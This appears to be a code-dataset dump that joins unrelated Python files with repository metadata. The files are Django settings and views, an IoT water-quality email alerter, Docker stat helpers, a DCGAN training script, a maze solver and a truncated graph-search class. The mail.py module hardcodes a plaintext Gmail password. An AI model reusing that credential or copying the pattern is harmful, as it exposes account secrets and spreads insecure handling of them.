STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
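# USE_S3 is truthy only when all four AWS settings above are present, so an
# environment without AWS credentials transparently falls back to the
# filesystem MEDIA_ROOT configured below.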
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
662e21ad2ed1290dd365a18efacf200e970e124a | 30eced58206ff84b918f12cb7030a9d719964bdb | /mail.py | 0566acd3c0de794e5468f1d450c1924dfc5a4aa5 | [] | no_license | yassinerabhi/IoT-WQMS | af87a0531c44b360e8f388f8b9b375a9ac8ab163 | cb4924be86534b3015ab5431512dae3f1373510f | refs/heads/master | 2023-06-25T06:58:53.927843 | 2021-07-26T12:04:36 | 2021-07-26T12:04:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,531 | py | """
This is an Email transaction module
Created on Sun, 25th of May 2019
Authors: Isaac Agyen Duffour & John Pk Erbynn
This module handles alerting on any out-of-range reading, which is sent as an email (Gmail)
Data can be sent to multiple email addresses concurrently, i.e. addresses in a list
Uses Simple Mail Transfer Protocol (SMTP)
Usage:
    Pass the JSON data as an argument to the send_mail function:
        send_mail(data)
    Expected data should be in the format:
data = {
"temperature": 30,
"turbidity": 7,
"ph": 2,
"water_level": 23
}
run <python mail.py> ... Done! enjoy :)
"""
import smtplib
from email.message import EmailMessage
def send_mail(sensor_data):
print("Error found while scanning data readings.\nSending email ...")
try:
email_address = '[email protected]'
email_password = 'iotaquaaid2019'
email_subject = "WQMS Alert ! :)"
to_email = ['[email protected]', '[email protected]', '[email protected]']
# to_email = '[email protected]'
print("Composing mail ...")
# creating object
msg = EmailMessage()
# email composition
msg['Subject'] = email_subject
msg['From'] = email_address
msg['To'] = to_email
# This identifies specific data being recorded wrongly
print("Catching internal parameter with error...")
check_error = ''
for key, value in sensor_data.items():
if key == "temperature":
if (value < 23) | (value > 34) :
if value < 23:
status = 'Water cold'
else:
status = 'Water hot'
check_error = f" \nTemperature out of range({status}): {value} °C "
print(check_error)
if key == "turbidity":
if (value < 0) | (value > 5) :
check_error = f" \nTurbidity out of range(Suspended particles present): {value} NTU "
print(check_error)
if key == "ph":
if (value < 6) | (value > 10) :
if value < 6:
status = 'acidic water'
else:
status = 'basic water'
check_error = f" \npH out of range({status}): {value} "
print(check_error)
if key == "water_level":
if (value < 5) | (value > 27) :
if value < 5:
status = 'water too low'
else:
status = 'water overflow'
check_error = f" \nWater_level out of range({status}): {value} cm "
print(check_error)
# main content of email
msg.set_content( f'Data collected... \n\n {sensor_data} \n\n {check_error}' )
# logging in and sending email
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(email_address, email_password)
smtp.send_message(msg)
print("Email sent successfully !!")
# runs if error occurs while trying to send email
except Exception as err:
print(f"Oops!!...Failed to send mail. {err}")
"""
for testing...run this module
"""
# data = {
# "temperature": 28,
# "turbidity": 4,
# "ph": 2,
# "water_level": 23,
# }
# send_mail(data)
| [
"[email protected]"
] | |
2bbd2fa42d3b7ef77f232286819679441c18a017 | c4e7ab2cef2e88e809ee14f962415552a3f0e62c | /lib/dockerAPI/container_function.py | 87f764d18936c3ef318ee7be48cb332e47c38a3b | [] | no_license | SerhiiRI/svmacm | 33b0cb8a008f2e7e8d7506cf3eb6227b468b3f87 | 827c80f9b6b5d38c89178e2e1b263d5c1f6415fd | refs/heads/master | 2020-04-30T15:09:29.027017 | 2019-07-16T05:19:26 | 2019-07-16T05:19:26 | 176,912,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,178 | py | def containerNameId(container_stats:dict) -> (int, int):
    # Docker reports the container name with a leading '/', so strip it
    return container_stats['name'][1:], container_stats['id']
def containerStatus(container_object) -> str:
return container_object.status
def cpuPercentUsage(container_stats:dict) -> int:
CPU_PERCENT = 0.0
CPUTotalUsage = float(container_stats['cpu_stats'] ['cpu_usage'] ['total_usage'])
PreCPUTotalUsage = float(container_stats['precpu_stats']['cpu_usage'] ['total_usage'])
percpu_core_usage = len (container_stats['cpu_stats'] ['cpu_usage'] ['percpu_usage'])
SystemUsage = float(container_stats['cpu_stats'] ['system_cpu_usage'])
PreSystemUsage = float(container_stats['precpu_stats']['system_cpu_usage'])
cpuDelta = CPUTotalUsage - PreCPUTotalUsage
systemDelta = SystemUsage - PreSystemUsage
if systemDelta > 0.0 and cpuDelta > 0.0:
CPU_PERCENT = (cpuDelta / systemDelta) \
* percpu_core_usage \
* 100.0
return int(CPU_PERCENT)
def networkUsage(container_stats:dict, format:str, interface="eth0") -> (int, int):
"""
By default this function print out to screen only memory
on device eth0, as standard VM configuration
:param container_stats: container status dictionary
:param format: format of output MB, KB, B(default)
:return: (tuple Receive Mem, Transceiver Mem)
"""
rx = float(container_stats['networks'][interface]['rx_bytes'])
tx = float(container_stats['networks'][interface]['tx_bytes'])
if (format is "MB"): (rx, tx) = (rx / (1024 * 1024), tx / (1024 * 1024))
if (format is "KB"): (rx, tx) = (rx / (1024) , tx / (1024))
return (int(rx), int(tx))
def memoryRAM(container_stats:dict) -> int:
#MEM_PERCENT = 0.0
maximum = float(container_stats["memory_stats"]["max_usage"])
used = float(container_stats["memory_stats"]["usage"])
return int(used / maximum * 100)
def imageNameTag(container_obj) -> (str, str):
try:
image, tag = container_obj.image.tags[0].split(":")
except Exception:
image, tag = container_obj.image.tags[0], "-"
return image, tag
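
# A minimal usage sketch (an assumption: the docker SDK for Python is
# installed and a container is running; the name "web" and interface "eth0"
# are illustrative, not taken from this project):
#
#   import docker
#   client = docker.from_env()
#   c = client.containers.get("web")
#   stats = c.stats(stream=False)
#   print(containerNameId(stats))
#   print(cpuPercentUsage(stats), "% CPU")
#   print(networkUsage(stats, format="MB"), "MB received/transmitted")
#   print(memoryRAM(stats), "% of peak RAM")
#   print(imageNameTag(c))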
| [
"[email protected]"
] | |
8d9c4a094530aa6fd1659cf637aa8f7a717eef3d | 63a5380d51f869a2cab239c18213f819ba23b900 | /Crudapp/views.py | f5ca18081418d0d60f5282821b286d800c899454 | [] | no_license | siva209/CRUD_Operations_Django | 7ced565b873dee1c2b303214964c2131e1e814cc | 73e8823e25566894afaf0120fd89991bdd6a9790 | refs/heads/master | 2023-02-09T09:38:31.195752 | 2021-01-03T15:51:24 | 2021-01-03T15:51:24 | 326,310,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | from django.shortcuts import render, redirect
# from .models import Student
from .forms import StudentForm
# Create your views here.
from .models import Student
def insert_view(request):
form = StudentForm()
if request.method == 'POST':
form = StudentForm(request.POST)
if form.is_valid():
form.save()
return redirect('/')
return render(request, 'star/Insert.html', {'form': form})
def show_view(request):
students = Student.objects.all()
return render(request, 'star/Show.html', {'students': students})
def delete_view(request,id):
students = Student.objects.get(id=id)
students.delete()
return redirect('/')
def update_view(request,id):
    students = Student.objects.get(id=id)
    # bind POST data when present; an unbound form pre-filled from the
    # instance is shown on GET (the original never redirected after saving
    # and never passed the form to the template)
    form = StudentForm(request.POST or None, instance=students)
    if form.is_valid():
        form.save(commit=True)
        return redirect('/')
    return render(request, 'star/update.html', {'students': students, 'form': form}) | [
"[email protected]"
] | |
0caf191fb549f59d8228d559861332387941c4a7 | 0852f95cb118158ddaa22ef44456011653200168 | /imonitor/manager/admin.py | 53ce6e36279be468a9599cf005c1b30cb93c2045 | [] | no_license | ultigeo/projectrack | 62695b7590116c2e9d508df8ad8287365d411513 | cc92a175826c2ac801d9f46facda49c140932262 | refs/heads/master | 2021-01-10T02:07:17.959683 | 2016-03-18T09:43:11 | 2016-03-18T09:43:11 | 53,311,808 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | from django.contrib import admin
from manager.models import *
# Register your models here.
class projectAdmin(admin.ModelAdmin):
pass
class membershipAdmin(admin.ModelAdmin):
pass
class departmentprojectsAdmin(admin.ModelAdmin):
pass
class teamAdmin(admin.ModelAdmin):
pass
class projectshipAdmin(admin.ModelAdmin):
pass
class rolesAdmin(admin.ModelAdmin):
pass
class teamshipAdmin(admin.ModelAdmin):
pass
class tasktypeAdmin(admin.ModelAdmin):
pass
class projecttypeAdmin(admin.ModelAdmin):
pass
class departmentAdmin(admin.ModelAdmin):
pass
class profileAdmin(admin.ModelAdmin):
pass
class taskAdmin(admin.ModelAdmin):
pass
class membersAdmin(admin.ModelAdmin):
pass
admin.site.register(Projects, projectAdmin)
admin.site.register(Members, membersAdmin)
admin.site.register(Membership, membershipAdmin)
admin.site.register(Teams, teamAdmin)
admin.site.register(Tasks, taskAdmin)
admin.site.register(Departments, departmentAdmin)
#admin.site.register(Departmentprojects, departmentprojectsAdmin)
admin.site.register(Profile, profileAdmin)
admin.site.register(Projecttype, projecttypeAdmin)
admin.site.register(Teamship, teamshipAdmin)
admin.site.register(Tasktype, tasktypeAdmin)
admin.site.register(Roles, rolesAdmin)
admin.site.register(Projectship, projectshipAdmin)
| [
"[email protected]"
] | |
c1027f7f2d99905f06539e0831e15ca0d9c30088 | b287837b42e00dc3b6b3b18f47c118f0e90136db | /W23_G_stride/dcgan.py | 4eabd49c410d080bb8d8dc7c0e2134e90667a2b8 | [] | no_license | GoareguerLucas/GAN-SDPC | 5adb0be8a9a3d52f27aad5f8429a5c498d6c5ec1 | 3142daa400502b7c3af73ffe6c00b4fe5a1531ec | refs/heads/master | 2023-03-31T06:21:59.340058 | 2019-11-20T10:25:15 | 2019-11-20T10:25:15 | 178,813,378 | 2 | 0 | null | 2023-03-24T22:48:50 | 2019-04-01T07:56:20 | Python | UTF-8 | Python | false | false | 14,455 | py | import argparse
import os
import numpy as np
import itertools
import torchvision.transforms as transforms
from torchvision.utils import save_image
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch
import sys
import matplotlib.pyplot as plt
import time
import datetime
parser = argparse.ArgumentParser()
parser.add_argument("-r", "--runs_path", type=str, default='G_stride/stride2/',
help="Dossier de stockage des résultats sous la forme : Experience_names/parameters/")
parser.add_argument("-e", "--n_epochs", type=int, default=100, help="number of epochs of training")
parser.add_argument("-b", "--batch_size", type=int, default=64, help="size of the batches")
parser.add_argument("--lrD", type=float, default=0.00005, help="adam: learning rate for D")
parser.add_argument("--lrG", type=float, default=0.00025, help="adam: learning rate for G")
parser.add_argument("--eps", type=float, default=0.5, help="batchnorm: espilon for numerical stability")
parser.add_argument("--b1", type=float, default=0.5, help="adam: decay of first order momentum of gradient")
parser.add_argument("--b2", type=float, default=0.999, help="adam: decay of first order momentum of gradient")
parser.add_argument("--lrelu", type=float, default=0.000001, help="LeakyReLU : alpha")
parser.add_argument("--latent_dim", type=int, default=32, help="dimensionality of the latent space")
parser.add_argument("--kernels_size", type=int, default=9, help="Taille des kernels")
parser.add_argument("--padding", type=int, default=4, help="Taille du padding")
parser.add_argument("-i", "--img_size", type=int, default=128, help="size of each image dimension")
parser.add_argument("--channels", type=int, default=3, help="number of image channels")
parser.add_argument("-s", "--sample_interval", type=int, default=10, help="interval between image sampling")
parser.add_argument("--sample_path", type=str, default='images')
parser.add_argument("-m", "--model_save_interval", type=int, default=150,
help="interval between image sampling. If model_save_interval > n_epochs : no save")
parser.add_argument('--model_save_path', type=str, default='models')
parser.add_argument('--load_model', action="store_true",
help="Load model present in model_save_path/Last_*.pt, if present.")
parser.add_argument("-d", "--depth", action="store_true",
help="Utiliser si utils.py et SimpsonsDataset.py sont deux dossier au dessus.")
parser.add_argument("-v", "--verbose", action="store_true",
help="Afficher des informations complémentaire.")
parser.add_argument("--GPU", type=int, default=0, help="Identifiant du GPU à utiliser.")
opt = parser.parse_args()
print(opt)
# Particular import
depth = ""
if opt.depth == True:
depth = "../"
sys.path.append(depth + "../") # ../../GAN-SDPC/
from SimpsonsDataset import SimpsonsDataset, FastSimpsonsDataset
from utils import *
from plot import *
# Folder where models are saved
os.makedirs(opt.model_save_path, exist_ok=True)
# Build the time tag
try:
tag = datetime.datetime.now().isoformat(sep='_', timespec='seconds')
except TypeError:
# Python 3.5 and below
# 'timespec' is an invalid keyword argument for this function
tag = datetime.datetime.now().replace(microsecond=0).isoformat(sep='_')
tag = tag.replace(':','.')
cuda = True if torch.cuda.is_available() else False
NL = nn.LeakyReLU(opt.lrelu, inplace=True)
opts_conv = dict(kernel_size=opt.kernels_size, stride=2, padding=opt.padding, padding_mode='zeros')
channels = [64, 128, 256, 512]
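# Spatial-size arithmetic for the settings above: the generator starts from
# init_size = img_size // stride**4 (128 // 16 = 8); each generator_block
# upsamples by scale_factor = stride*2 = 4 and then convolves with stride 2,
# a net x2 per block, so four blocks bring 8 -> 128. The discriminator
# mirrors this with four stride-2 convolutions, 128 -> 8.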
class Generator(nn.Module):
def __init__(self, verbose=opt.verbose):
super(Generator, self).__init__()
def generator_block(in_filters, out_filters):
block = [nn.UpsamplingNearest2d(scale_factor=opts_conv['stride']*2), nn.Conv2d(in_filters, out_filters, kernel_size=opts_conv['kernel_size'], stride=opts_conv['stride'], padding=opts_conv['padding'], padding_mode=opts_conv['padding_mode']), nn.BatchNorm2d(out_filters, opt.eps), NL]
return block
self.verbose = verbose
self.init_size = opt.img_size // opts_conv['stride']**4
self.l1 = nn.Sequential(nn.Linear(opt.latent_dim, channels[3] * self.init_size ** 2), NL)
self.conv1 = nn.Sequential(*generator_block(channels[3], channels[2]),)
self.conv2 = nn.Sequential(*generator_block(channels[2], channels[1]),)
self.conv3 = nn.Sequential(*generator_block(channels[1], channels[0]),)
self.conv4 = nn.Sequential(*generator_block(channels[0], 3),nn.Tanh(),)
"""self.conv_blocks = nn.Sequential(
nn.Conv2d(channels[0], opt.channels, 3, stride=1, padding=1),
nn.Tanh(),
)"""
def forward(self, z):
if self.verbose: print("G")
# Dim : opt.latent_dim
out = self.l1(z)
if self.verbose: print("l1 out : ",out.shape)
out = out.view(out.shape[0], channels[3], self.init_size, self.init_size)
# Dim : (channels[3], opt.img_size/8, opt.img_size/8)
if self.verbose: print("View out : ",out.shape)
out = self.conv1(out)
# Dim : (channels[3]/2, opt.img_size/4, opt.img_size/4)
if self.verbose: print("Conv1 out : ",out.shape)
out = self.conv2(out)
# Dim : (channels[3]/4, opt.img_size/2, opt.img_size/2)
if self.verbose: print("Conv2 out : ",out.shape)
out = self.conv3(out)
# Dim : (channels[3]/8, opt.img_size, opt.img_size)
if self.verbose: print("Conv3 out : ",out.shape)
img = self.conv4(out)
# Dim : (opt.chanels, opt.img_size, opt.img_size)
if self.verbose: print("img out : ", img.shape)
return img
def _name(self):
return "Generator"
class Discriminator(nn.Module):
def __init__(self,verbose=opt.verbose):
super(Discriminator, self).__init__()
def discriminator_block(in_filters, out_filters, bn=True):
block = [nn.Conv2d(in_filters, out_filters, **opts_conv), NL]#, nn.Dropout2d(0.25)
if bn:
block.append(nn.BatchNorm2d(out_filters, opt.eps))
return block
self.verbose = verbose
self.conv1 = nn.Sequential(*discriminator_block(opt.channels, channels[0], bn=False),)
self.conv2 = nn.Sequential(*discriminator_block(channels[0], channels[1]),)
self.conv3 = nn.Sequential(*discriminator_block(channels[1], channels[2]),)
self.conv4 = nn.Sequential(*discriminator_block(channels[2], channels[3]),)
# The height and width of downsampled image
self.init_size = opt.img_size // opts_conv['stride']**4
self.adv_layer = nn.Sequential(nn.Linear(channels[3] * self.init_size ** 2, 1))#, nn.Sigmoid()
def forward(self, img):
if self.verbose:
print("D")
print("Image shape : ",img.shape)
out = self.conv1(img)
print("Conv1 out : ",out.shape)
out = self.conv2(out)
print("Conv2 out : ",out.shape)
out = self.conv3(out)
print("Conv3 out : ",out.shape)
out = self.conv4(out)
print("Conv4 out : ",out.shape)
out = out.view(out.shape[0], -1)
print("View out : ",out.shape)
validity = self.adv_layer(out)
print("Val out : ",validity.shape)
else:
# Dim : (opt.chanels, opt.img_size, opt.img_size)
out = self.conv1(img)
# Dim : (channels[3]/8, opt.img_size/2, opt.img_size/2)
out = self.conv2(out)
# Dim : (channels[3]/4, opt.img_size/4, opt.img_size/4)
out = self.conv3(out)
# Dim : (channels[3]/2, opt.img_size/4, opt.img_size/4)
out = self.conv4(out)
# Dim : (channels[3], opt.img_size/8, opt.img_size/8)
out = out.view(out.shape[0], -1)
validity = self.adv_layer(out)
# Dim : (1)
return validity
def _name(self):
return "Discriminator"
# Loss function
adversarial_loss = torch.nn.BCEWithLogitsLoss()
sigmoid = nn.Sigmoid()
# Initialize generator and discriminator
generator = Generator()
discriminator = Discriminator()
print_network(generator)
print_network(discriminator)
if cuda:
#print("Nombre de GPU : ",torch.cuda.device_count())
if torch.cuda.device_count() > opt.GPU:
torch.cuda.set_device(opt.GPU)
generator.cuda()
discriminator.cuda()
adversarial_loss.cuda()
# Initialize weights
generator.apply(weights_init_normal)
discriminator.apply(weights_init_normal)
# Configure data loader
dataloader = load_data(depth + "../../cropped_clear/cp/", opt.img_size, opt.batch_size, rand_hflip=True)
# Optimizers
optimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lrG, betas=(opt.b1, opt.b2))
optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lrD, betas=(opt.b1, opt.b2))
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
# ----------
# Load models
# ----------
start_epoch = 1
if opt.load_model == True:
start_epoch = load_models(discriminator, optimizer_D, generator, optimizer_G, opt.n_epochs, opt.model_save_path)
# ----------
# Tensorboard
# ----------
path_data1 = depth + "../runs/" + opt.runs_path
path_data2 = depth + "../runs/" + opt.runs_path + tag[:-1] + "/"
# Runs are saved in a "runs" folder at the project root, inside the opt.runs_path subfolder.
os.makedirs(path_data1, exist_ok=True)
os.makedirs(path_data2, exist_ok=True)
writer = SummaryWriter(log_dir=path_data2)
# ----------
# Training
# ----------
nb_batch = len(dataloader)
nb_epochs = 1 + opt.n_epochs - start_epoch
hist = init_hist(nb_epochs, nb_batch)
save_dot = 1 # number of epochs between saved points on the curves
batch_on_save_dot = save_dot*len(dataloader)
# Vecteur z fixe pour faire les samples
N_samples = 24
fixed_noise = Variable(Tensor(np.random.normal(0, 1, (N_samples, opt.latent_dim))))
t_total = time.time()
for j, epoch in enumerate(range(start_epoch, opt.n_epochs + 1)):
t_epoch = time.time()
for i, (imgs, _) in enumerate(dataloader):
t_batch = time.time()
# ---------------------
# Train Discriminator
# ---------------------
# Adversarial ground truths
valid_smooth = Variable(Tensor(imgs.shape[0], 1).fill_(float(np.random.uniform(0.9, 1.0, 1))), requires_grad=False)
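        # One-sided label smoothing: the "real" target is drawn from [0.9, 1.0]
        # instead of a hard 1.0, which keeps the discriminator from becoming
        # overconfident; fake targets stay at a hard 0.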
valid = Variable(Tensor(imgs.size(0), 1).fill_(1), requires_grad=False)
fake = Variable(Tensor(imgs.size(0), 1).fill_(0), requires_grad=False)
# Configure input
real_imgs = Variable(imgs.type(Tensor))
# Generate a batch of images
z = np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim))
z = Variable(Tensor(z))
gen_imgs = generator(z)
optimizer_D.zero_grad()
# Real batch
# Discriminator descision
d_x = discriminator(real_imgs)
# Measure discriminator's ability to classify real from generated samples
real_loss = adversarial_loss(d_x, valid_smooth)
# Backward
real_loss.backward()
# Fake batch
# Discriminator descision
d_g_z = discriminator(gen_imgs.detach())
# Measure discriminator's ability to classify real from generated samples
fake_loss = adversarial_loss(d_g_z, fake)
# Backward
fake_loss.backward()
d_loss = real_loss + fake_loss
optimizer_D.step()
# -----------------
# Train Generator
# -----------------
optimizer_G.zero_grad()
# New discriminator descision, Since we just updated D
d_g_z = discriminator(gen_imgs)
# Loss measures generator's ability to fool the discriminator
g_loss = adversarial_loss(d_g_z, valid)
# Backward
g_loss.backward()
optimizer_G.step()
print(
"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f] [Time: %fs]"
% (epoch, opt.n_epochs, i+1, len(dataloader), d_loss.item(), g_loss.item(), time.time()-t_batch)
)
# Compensation pour le BCElogits
d_x = sigmoid(d_x)
d_g_z = sigmoid(d_g_z)
# Save Losses and scores for Tensorboard
save_hist_batch(hist, i, j, g_loss, d_loss, d_x, d_g_z)
# Tensorboard save
iteration = i + nb_batch * j
writer.add_scalar('g_loss', g_loss.item(), global_step=iteration)
writer.add_scalar('d_loss', d_loss.item(), global_step=iteration)
writer.add_scalar('d_x_mean', hist["d_x_mean"][i], global_step=iteration)
writer.add_scalar('d_g_z_mean', hist["d_g_z_mean"][i], global_step=iteration)
writer.add_scalar('d_x_cv', hist["d_x_cv"][i], global_step=iteration)
writer.add_scalar('d_g_z_cv', hist["d_g_z_cv"][i], global_step=iteration)
writer.add_histogram('D(x)', d_x, global_step=iteration)
writer.add_histogram('D(G(z))', d_g_z, global_step=iteration)
writer.add_scalar('D_x_max', hist["D_x_max"][j], global_step=epoch)
writer.add_scalar('D_x_min', hist["D_x_min"][j], global_step=epoch)
writer.add_scalar('D_G_z_min', hist["D_G_z_min"][j], global_step=epoch)
writer.add_scalar('D_G_z_max', hist["D_G_z_max"][j], global_step=epoch)
# Save samples
if epoch % opt.sample_interval == 0:
tensorboard_sampling(fixed_noise, generator, writer, epoch)
# Save models
if epoch % opt.model_save_interval == 0:
num = str(int(epoch / opt.model_save_interval))
save_model(discriminator, optimizer_D, epoch, opt.model_save_path + "/" + num + "_D.pt")
save_model(generator, optimizer_G, epoch, opt.model_save_path + "/" + num + "_G.pt")
print("[Epoch Time: ", time.time() - t_epoch, "s]")
durer = time.gmtime(time.time() - t_total)
print("[Total Time: ", durer.tm_mday - 1, "j:", time.strftime("%Hh:%Mm:%Ss", durer), "]", sep='')
# Save model for futur training
if opt.model_save_interval < opt.n_epochs + 1:
save_model(discriminator, optimizer_D, epoch, opt.model_save_path + "/last_D.pt")
save_model(generator, optimizer_G, epoch, opt.model_save_path + "/last_G.pt")
writer.close()
| [
"[email protected]"
] | |
73f418059cd93c1b2a8f0ff43f32f7dec2126d23 | bed5bc17c2ae6914d3c0f797b399cf3e581567fe | /shopping/shop_app/models/category.py | b84cfdbcca933cdbfeea29e33d5faf73b11f587e | [] | no_license | the-vampiire/medi_assessment | 5eb12ad38b2dd24ac64371f7c50fcdd241fbbdeb | 6a316c4c13ac36e3981487b2846ee802183f7761 | refs/heads/master | 2021-04-15T03:55:57.900107 | 2018-04-02T04:59:36 | 2018-04-02T04:59:36 | 126,254,426 | 2 | 2 | null | 2018-03-26T09:44:10 | 2018-03-21T23:52:11 | Python | UTF-8 | Python | false | false | 276 | py | from django.db import models
class Category(models.Model):
class Meta:
db_table = 'categories'
verbose_name = 'category'
verbose_name_plural = 'categories'
name = models.CharField(max_length = 50, blank = False)
def __str__(self):
return self.name
| [
"[email protected]"
] | |
132a673c4540d33115e6d942dd7104bf39238eeb | f56f89b4834b4dde8cb2528a013e36e217e28eff | /accounts/models.py | 5b88a8a13c358d98c14b1c72bbd4424e083f80dc | [] | no_license | mainliner/paintind | 6c271ac8bb42b96d2b0add5c73c6a2cf4480c4bc | bd3c9282b655716c8f687a812b1735406c76b6e7 | refs/heads/master | 2020-12-24T13:43:55.951264 | 2013-09-14T09:01:31 | 2013-09-14T09:01:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from django.db import models
from django.contrib.auth.models import User
class User_info(models.Model):
user = models.ForeignKey(User)
photo = models.CharField(max_length=500)
fans_num = models.IntegerField()
follower_num = models.IntegerField()
describe = models.CharField(max_length=500)
    def __unicode__(self):
        # return a string, not the User instance itself
        return self.user.username
class Fans(models.Model):
user = models.ForeignKey(User)
fans = models.CharField(max_length=200)
class Follower(models.Model):
user = models.ForeignKey(User)
follower = models.CharField(max_length=200) | [
"[email protected]"
] | |
c417b65d88af2a41f1a6f2a8abc0ebe574230c12 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /tbz5ji3ocwzAeLQNa_17.py | e50d572a8bfe14ab16d76f9f91ad29fc1f351a4f | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py |
def exit_maze(maze, directions):
l = len(maze)
w = len(maze[0])
for y in range(l):
for x in range(w):
if maze[y][x] == 2:
sx = x
sy = y
for i in directions:
if i == 'N':
sy -= 1
elif i == 'E':
sx += 1
elif i == 'S':
sy += 1
elif i == 'W':
sx -= 1
else:
return 'Bad Direction'
if sy < 0 or sy >= l:
return 'Dead'
if sx < 0 or sx >= w:
return 'Dead'
if maze[sy][sx] == 1:
return 'Dead'
if maze[sy][sx] == 3:
return 'Finish'
return 'Lost'
| [
"[email protected]"
] | |
d93299d81fdc7fe2ace91bc0ea286e69ce8136aa | cda54a77875d95fb0a60f3655263b2e3d68984bf | /program0_test.py | 873aa777ac19e4737180c9534a3686abde3c2455 | [] | no_license | bilashProshad/Python-code | 87ef96d62bc262648427980b357e1cb7de56194d | 4d84238f3c57d6877d23629fd10c9d0bee6fb35e | refs/heads/master | 2023-05-04T10:54:48.481436 | 2021-05-26T19:50:36 | 2021-05-26T19:50:36 | 371,153,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,368 | py | graph = {
"S": {"A": 2, "B": 1, "G": 9},
"A": {"C": 2, "D": 3},
"B": {"D": 2, "E": 4},
"C": {"G": 4},
"D": {"G": 4},
"E": {"E":0}
}
heuristic = {
"S": 6,
"A": 0,
"B": 6,
"C": 4,
"D": 1,
"E": 10,
"G": 0
}
class graphProblem:
def __init__(self, initial, goal, graph):
self.initial = initial
self.goal = goal
self.graph = graph
def actions(self, state):
return list(self.graph[state].keys())
def result(self, state, action):
return action
def goal_test(self, state):
return state == self.goal
def path_cost(self, cost_so_far, state1, action, state2):
return cost_so_far + self.graph[state1][state2]
class Node:
def __init__(self, state, parent=None, action=None, path_cost=0):
self.state = state
self.parent = parent
self.action = action
self.path_cost = path_cost
def expand(self, graphProblem):
return [self.child_node(graphProblem, action)
for action in graphProblem.actions(self.state)]
def child_node(self, graphProblem, action):
next_state = graphProblem.result(self.state, action)
return Node(next_state, self, action,
graphProblem.path_cost(self.path_cost, self.state, action, next_state))
def path(self):
node, path_back = self, []
while node:
path_back.append(node)
node = node.parent
return list(reversed(path_back))
def solution(self):
return [node.action for node in self.path()[1:]]
class Queue:
def __init__(self, pop_index):
self.queue = []
self.pop_index = pop_index
def append(self, item):
self.queue.append(item)
def sortAppend(self, item, f):
self.queue.append(item)
self.queue.sort(key=f)
def extend(self, items):
